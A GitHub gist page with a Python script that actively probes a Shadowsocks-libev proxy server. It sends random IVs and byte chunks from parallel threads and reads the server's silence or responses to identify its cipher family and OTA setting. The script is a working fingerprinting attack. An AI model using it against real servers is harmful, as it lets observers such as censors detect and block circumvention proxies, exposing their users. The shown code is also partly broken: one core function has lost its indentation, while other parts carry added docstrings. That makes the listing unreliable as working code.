Skip to content

Instantly share code, notes, and snippets.

@jimages
Created July 20, 2017 08:07
Show Gist options
  • Save jimages/c1d3f7a8b2e31fa65728056ff9b2d4e1 to your computer and use it in GitHub Desktop.
Save jimages/c1d3f7a8b2e31fa65728056ff9b2d4e1 to your computer and use it in GitHub Desktop.
Shadowsocks-libev attack
#!/usr/bin/env python
#-*- coding: utf-8 -*-
'''
Copyleft (c) 2016 breakwa11
https://github.com/breakwa11/shadowsocks-rss
'''
import logging
import socket
import time
import traceback
import os
import struct
import threading
import binascii
# Number of probe threads started per scan round (see the range() loops in scan()).
scan_first_try = 8
# NOTE(review): not referenced anywhere in the code visible in this file.
scan_max_try = 64
# Initial permit count of the semaphore that throttles probe threads; scan()
# also acquires this many permits to wait until every thread has finished.
max_thread_num = 16
def compat_ord(s):
    """Return the integer value of ``s`` on both Python 2 and Python 3.

    A plain ``int`` is passed through unchanged; anything else is handed
    to the saved builtin ``_ord``.
    """
    return s if type(s) is int else _ord(s)
def compat_chr(d):
    """Return the one-byte string for integer ``d`` on Python 2 and 3.

    When ``bytes`` and ``str`` are distinct types (Python 3) a one-element
    ``bytes`` object is built; otherwise the saved builtin ``_chr`` is used.
    """
    if bytes is not str:
        return bytes([d])
    return _chr(d)
# Keep handles on the real builtins first, then shadow ``ord``/``chr``
# module-wide with the Python 2/3 compatible wrappers.
_ord, _chr = ord, chr
ord, chr = compat_ord, compat_chr
def to_bytes(s):
    """Return ``s`` UTF-8 encoded when it is a text ``str`` on Python 3.

    On Python 2 (where ``bytes`` is ``str``) and for any non-``str`` value
    the argument is returned unchanged.
    """
    needs_encoding = bytes is not str and type(s) is str
    return s.encode('utf-8') if needs_encoding else s
def to_str(s):
    """Return ``s`` UTF-8 decoded when it is a ``bytes`` object on Python 3.

    On Python 2 (where ``bytes`` is ``str``) and for any non-``bytes``
    value the argument is returned unchanged.
    """
    needs_decoding = bytes is not str and type(s) is bytes
    return s.decode('utf-8') if needs_decoding else s
def random_string(length):
    """Return ``length`` random bytes obtained from ``os.urandom``."""
    payload = os.urandom(length)
    return payload
def test_single(iv, ip, port, addrtype, attack_data_list, connect_timeout = 5, timeout = 2):
try:
addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM, socket.SOL_TCP)
af, socktype, proto, canonname, sa = addrs[0]
s = socket.socket(af, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
s.settimeout(connect_timeout)
s.connect(sa)
s.send(iv)
ok = 0
index = 0
s.settimeout(timeout)
while ok == index and index < len(attack_data_list):
s.send(attack_data_list[index])
index += 1
try:
ret = s.recv(1024)
except socket.timeout:
ok += 1
continue
except:
pass
break
return ok
except:
pass
class TestThread(threading.Thread):
    """Worker thread that runs one ``test_single`` probe and records the result.

    A semaphore permit is acquired in the constructor (so the creating
    thread blocks while no permit is free) and released when ``run``
    finishes.
    """

    def __init__(self, lock, semaphore, index, attack_ok_list, params):
        """Store the shared state and take one semaphore permit.

        Args:
            lock: Lock guarding ``attack_ok_list``.
            semaphore: Semaphore limiting concurrently live workers.
            index: Identifier stored with the recorded result.
            attack_ok_list: Shared list that successful results are appended to.
            params: Positional argument tuple passed to ``test_single``.
        """
        threading.Thread.__init__(self)
        self.lock = lock
        self.semaphore = semaphore
        self.index = index
        self.params = params
        self.attack_ok_list = attack_ok_list
        semaphore.acquire()

    def run(self):
        """Probe up to three times and append a non-zero result to the shared list."""
        try:
            for _retry in range(3):
                ok = test_single(*self.params)
                if ok is None:
                    # Probe could not complete; try again.
                    continue
                if ok:
                    with self.lock:
                        self.attack_ok_list.append(
                            [self.index, ok, self.params[0], self.params[3], self.params[4]])
                break
        finally:
            # Release even on an unexpected error, otherwise the code that
            # waits by draining the semaphore would block forever.
            self.semaphore.release()
def _probe_round(addr, port, addrtype, first_chunk_len, lock):
    """Run one round of parallel probes and return the list of recorded results."""
    results = []
    semaphore = threading.Semaphore(max_thread_num)
    for index in range(scan_first_try):
        attack_data_list = [
            random_string(first_chunk_len),
            random_string(1),
            random_string(4),
            random_string(4),
        ]
        iv = random_string(8)
        worker = TestThread(lock, semaphore, index, results,
                            (iv, addr, port, addrtype, attack_data_list))
        worker.start()
    print("Waiting response")
    # Each worker holds one permit until it finishes, so being able to take
    # every permit means all workers are done.
    for _ in range(max_thread_num):
        semaphore.acquire()
    print("attack size %d" % (len(results),))
    return results


def _lowest_ok(results):
    """Return the smallest recorded ``ok`` count, capped at 10 like the original scan."""
    return min([10] + [item[1] for item in results])


def scan(addr, port):
    """Probe ``addr:port`` and report whether it matches the expected server profile.

    A round of probes sends a random 8-byte IV followed by random chunks
    of 2, 1, 4 and 4 bytes and records, per probe, how many chunks the
    server stayed silent for.  If the smallest recorded count is 4, the
    round is repeated with a 12-byte first chunk and ``ota`` is reported
    as True.  The IV size is then derived as ``4 + min_index * 4`` and
    one recorded probe is replayed with its payload truncated; the target
    is reported only if the server does not stay silent on the replay.
    NOTE(review): why these byte counts separate the ciphers is protocol
    knowledge not shown in this file.

    Args:
        addr: Host name or address of the target.
        port: TCP port of the target.

    Returns:
        True if a matching server was identified (a message is printed),
        False otherwise.
    """
    addrtype = 0
    ota = False
    lock = threading.Lock()

    attack_ok_list = _probe_round(addr, port, addrtype, 2, lock)
    if not attack_ok_list:
        return False
    min_index = _lowest_ok(attack_ok_list)
    print("min_index %d" % (min_index,))

    if min_index == 4:
        # Every chunk was accepted silently: retry with a longer first chunk.
        ota = True
        attack_ok_list = _probe_round(addr, port, addrtype, 12, lock)
        if not attack_ok_list:
            return False
        min_index = _lowest_ok(attack_ok_list)
        print("OTA min_index %d" % (min_index,))
        if min_index == 4:
            return False

    iv_size = 4 + min_index * 4
    encryptor_info = {
        16: 'rc4-md5/aes',
        8: 'chacha20/salsa20',
        12: 'chacha20-ietf',
    }
    for attack_item in attack_ok_list:
        if attack_item[1] != min_index:
            continue
        iv = attack_item[2]
        att_data = b''.join(attack_item[4])
        # Replay the same IV with the payload truncated as a single chunk;
        # only a probe that is NOT met with silence (ok == 0) confirms.
        ok = test_single(iv, addr, port, 0, [att_data[:iv_size - len(iv) + 2]])
        if ok == 0:
            print("%s:%d is a Shadowsocks-libev server with %s encryptor, OTA = %s" % (addr, port, encryptor_info[iv_size], ota))
            return True
    return False
def main(addr, port):
    """Scan ``addr:port`` and print a fallback message when nothing was identified."""
    identified = scan(addr, port)
    if not identified:
        print("%s:%d is an unknown server" % (addr, port))
if __name__ == '__main__':
    # Target to probe: server ip or hostname, and server port.
    addr, port = "127.0.0.1", 8988
    main(addr, port)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment